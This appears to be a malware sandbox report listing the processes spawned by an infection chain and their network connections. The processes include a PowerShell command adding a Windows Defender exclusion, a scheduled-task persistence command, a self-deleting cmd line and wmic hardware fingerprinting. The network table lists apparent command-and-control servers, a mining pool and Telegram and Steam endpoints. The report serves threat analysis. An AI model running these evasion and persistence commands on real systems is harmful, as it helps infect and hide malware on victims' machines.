"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\BtnoWSiF.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6884 -ip 6884
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BtnoWSiF" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFF27.tmp"
C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe"
C:\Users\Admin\AppData\Local\Temp\is-NUNUV.tmp\ubi-inst.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NUNUV.tmp\ubi-inst.tmp" /SL5="$60412,922170,832512,C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6264 -ip 6264
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\ProgramData\axaso\bkujn.exe
C:\ProgramData\axaso\bkujn.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1336
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6264 -s 308
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6884 -ip 6884
C:\ProgramData\axaso\bkujn.exe
"C:\ProgramData\axaso\bkujn.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5836 -ip 5836
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-IADQN.tmp\set.bat""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1432
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\ProgramData\hwnab\wjnasib.exe
C:\ProgramData\hwnab\wjnasib.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5696 -ip 5696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 444
C:\ProgramData\hwnab\wjnasib.exe
"C:\ProgramData\hwnab\wjnasib.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1340
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\ProgramData\hwnab\wjnasib.exe
C:\ProgramData\hwnab\wjnasib.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6556 -ip 6556
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 448
C:\ProgramData\hwnab\wjnasib.exe
"C:\ProgramData\hwnab\wjnasib.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2672 -ip 2672
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 1300
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.130.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| CN | 222.186.172.42:1000 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| US | 8.8.8.8:53 | 33.177.156.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| DE | 212.113.107.84:80 | 212.113.107.84 | tcp |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | 84.107.113.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| US | 8.8.8.8:53 | home.sevkk17sr.top | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | AcDyjGxADzSolWB.AcDyjGxADzSolWB | udp |
| US | 8.8.8.8:53 | 72.23.230.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 104.21.45.165:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | cdn-downloads.com | udp |
| NL | 203.161.45.11:443 | cdn-downloads.com | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.45.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.45.161.203.in-addr.arpa | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.58.21.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.95.123.104.in-addr.arpa | udp |
| US | 104.21.45.165:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.195:3333 | pool.supportxmr.com | tcp |
| US | 8.8.8.8:53 | 195.96.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grupodulcemar.pe | udp |
| PE | 161.132.57.101:443 | grupodulcemar.pe | tcp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| US | 144.172.71.105:1338 | 144.172.71.105 | tcp |
| US | 8.8.8.8:53 | 105.71.172.144.in-addr.arpa | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 144.172.71.105:1338 | 144.172.71.105 | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | GDinpHlLXN.GDinpHlLXN | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 8.8.8.8:53 | download.innovare.no | udp |
| NO | 217.149.124.92:80 | download.innovare.no | tcp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| US | 8.8.8.8:53 | 92.124.149.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 208.242.5.163.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | berrylinyj.cyou | udp |
| US | 8.8.8.8:53 | worddosofrm.shop | udp |
| US | 8.8.8.8:53 | mutterissuen.shop | udp |
| US | 8.8.8.8:53 | standartedby.shop | udp |
| US | 8.8.8.8:53 | nightybinybz.shop | udp |
| US | 8.8.8.8:53 | conceszustyb.shop | udp |
| US | 8.8.8.8:53 | bakedstusteeb.shop | udp |
| US | 8.8.8.8:53 | respectabosiz.shop | udp |
| US | 8.8.8.8:53 | moutheventushz.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 254.238.217.23.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| RU | 185.215.113.66:5152 | twizt.net | tcp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | 175.117.168.52.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | arteflordeliz.com.br | udp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| US | 108.179.252.235:80 | arteflordeliz.com.br | tcp |
| US | 8.8.8.8:53 | 82.235.72.20.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 235.252.179.108.in-addr.arpa | udp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| YE | 134.35.107.95:40500 | udp | |
| UZ | 90.156.164.103:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 217.30.160.219:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 2.133.136.145:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 151.241.234.162:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 90.156.163.98:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| IR | 93.119.67.90:40500 | udp | |
| TR | 85.103.235.188:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 213.211.105.70:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| SY | 95.212.120.220:40500 | udp | |
| NL | 89.110.69.103:80 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| IR | 89.219.192.32:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 31.171.187.236:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 82.200.169.186:40500 | udp | |
| TJ | 91.231.253.155:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 217.218.8.134:40500 | udp | |
| CN | 47.115.54.19:80 | tcp | |
| US | 8.8.8.8:53 | home.tventjo20vs.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.176.94.43:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| CN | 219.159.184.14:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| GT | 190.56.14.82:40500 | udp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| MX | 189.142.102.173:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 198.163.193.229:40500 | tcp | |
| TR | 85.103.235.188:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AO | 102.215.170.62:40500 | udp | |
| CN | 47.116.27.92:8081 | tcp | |
| US | 8.8.8.8:53 | 300snails.sbs | udp |
| US | 8.8.8.8:53 | thicktoys.sbs | udp |
| US | 8.8.8.8:53 | fleez-inc.sbs | udp |
| US | 8.8.8.8:53 | 3xc1aimbl0w.sbs | udp |
| US | 8.8.8.8:53 | bored-light.sbs | udp |
| US | 8.8.8.8:53 | faintbl0w.sbs | udp |
| US | 8.8.8.8:53 | crib-endanger.sbs | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 5.251.234.88:40500 | udp | |
| UZ | 213.230.126.169:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 93.188.83.239:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.190.224.152:40500 | tcp | |
| UZ | 90.156.160.10:40500 | udp | |
| US | 8.8.8.8:53 | dev.cyberark-igiwax.com | udp |
| US | 44.243.209.238:80 | dev.cyberark-igiwax.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 198.163.196.30:40500 | udp | |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 172.67.139.78:443 | drive-connect.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| US | 192.210.150.26:8787 | tcp | |
| KR | 211.204.100.20:1234 | 211.204.100.20 | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| UZ | 90.156.161.73:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 5.251.95.166:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.185.189.167:40500 | udp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 178.206.158.183:40500 | tcp | |
| IR | 5.134.199.85:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 37.151.133.175:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.181.206.190:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 77.81.135.219:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| KR | 146.56.118.137:80 | 146.56.118.137 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| MX | 201.114.202.249:40500 | udp | |
| US | 8.8.8.8:53 | d.kpzip.com | udp |
| CN | 14.205.47.205:80 | d.kpzip.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| CI | 160.155.209.135:40500 | udp | |
| YE | 178.130.96.97:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AF | 149.54.20.134:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 151.241.114.78:40500 | udp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 198.163.193.229:40500 | udp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | ftp.ywxww.net | udp |
| CN | 60.191.208.187:820 | ftp.ywxww.net | tcp |
| IR | 2.176.72.136:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 84.54.71.94:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 93.188.86.253:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| EG | 45.241.38.203:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.177.40.206:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | 123.ywxww.net | udp |
| IR | 5.232.126.125:40500 | udp | |
| CN | 60.191.208.187:820 | 123.ywxww.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 2.133.70.66:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| MX | 189.167.22.36:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 92.38.19.10:40500 | tcp | |
| MX | 189.135.23.235:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| N/A | 172.16.16.140:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| GH | 196.175.1.52:40500 | udp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| DE | 172.105.66.118:80 | 172.105.66.118 | tcp |
| NL | 185.180.196.46:80 | 185.180.196.46 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| RU | 188.124.116.191:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 151.233.61.190:40500 | tcp | |
| RU | 94.51.68.160:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 83.222.7.85:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 176.113.115.33:80 | 176.113.115.33 | tcp |
| IR | 89.43.216.137:40500 | udp | |
| RU | 176.113.115.163:80 | 176.113.115.163 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| YE | 178.130.118.237:40500 | udp | |
| VN | 103.173.254.78:80 | 103.173.254.78 | tcp |
| CN | 111.231.145.137:8888 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| TJ | 95.142.87.201:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| SY | 77.44.192.46:40500 | udp | |
| KG | 212.112.107.11:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 95.59.33.46:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| SY | 82.100.175.13:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 91.122.218.118:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| BR | 147.45.116.5:80 | 147.45.116.5 | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| IR | 185.123.69.190:40500 | udp | |
| FR | 216.58.214.174:443 | google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 192.210.150.26:8787 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| HK | 134.122.129.18:80 | 134.122.129.18 | tcp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| SY | 77.44.162.69:40500 | udp | |
| IR | 5.232.120.72:40500 | tcp | |
| US | 8.8.8.8:53 | deauduafzgezzfgm.top | udp |
| RU | 185.215.113.66:80 | deauduafzgezzfgm.top | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| KZ | 92.47.230.214:40500 | udp | |
| US | 8.8.8.8:53 | aeufoeahfouefhg.top | udp |
| RU | 185.215.113.66:80 | aeufoeahfouefhg.top | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 16.15.176.226:443 | bbuseruploads.s3.amazonaws.com | tcp |
| IR | 2.176.112.82:40500 | udp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| KZ | 2.134.250.184:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AO | 102.130.192.212:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 93.188.86.208:40500 | udp | |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| IR | 2.176.112.82:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | worddosofrm.shop | udp |
| UZ | 86.62.3.67:40500 | udp | |
| US | 8.8.8.8:53 | mutterissuen.shop | udp |
| US | 8.8.8.8:53 | standartedby.shop | udp |
| US | 8.8.8.8:53 | nightybinybz.shop | udp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | conceszustyb.shop | udp |
| US | 8.8.8.8:53 | bakedstusteeb.shop | udp |
| US | 8.8.8.8:53 | respectabosiz.shop | udp |
| US | 8.8.8.8:53 | moutheventushz.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| EG | 102.189.164.188:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 185.208.159.121:80 | 185.208.159.121 | tcp |
| US | 185.208.159.121:80 | 185.208.159.121 | tcp |
| US | 8.8.8.8:53 | down.mvip8.ru | udp |
| US | 172.67.130.102:80 | down.mvip8.ru | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | win-network-checker.cc | udp |
| UZ | 93.188.86.253:40500 | udp | |
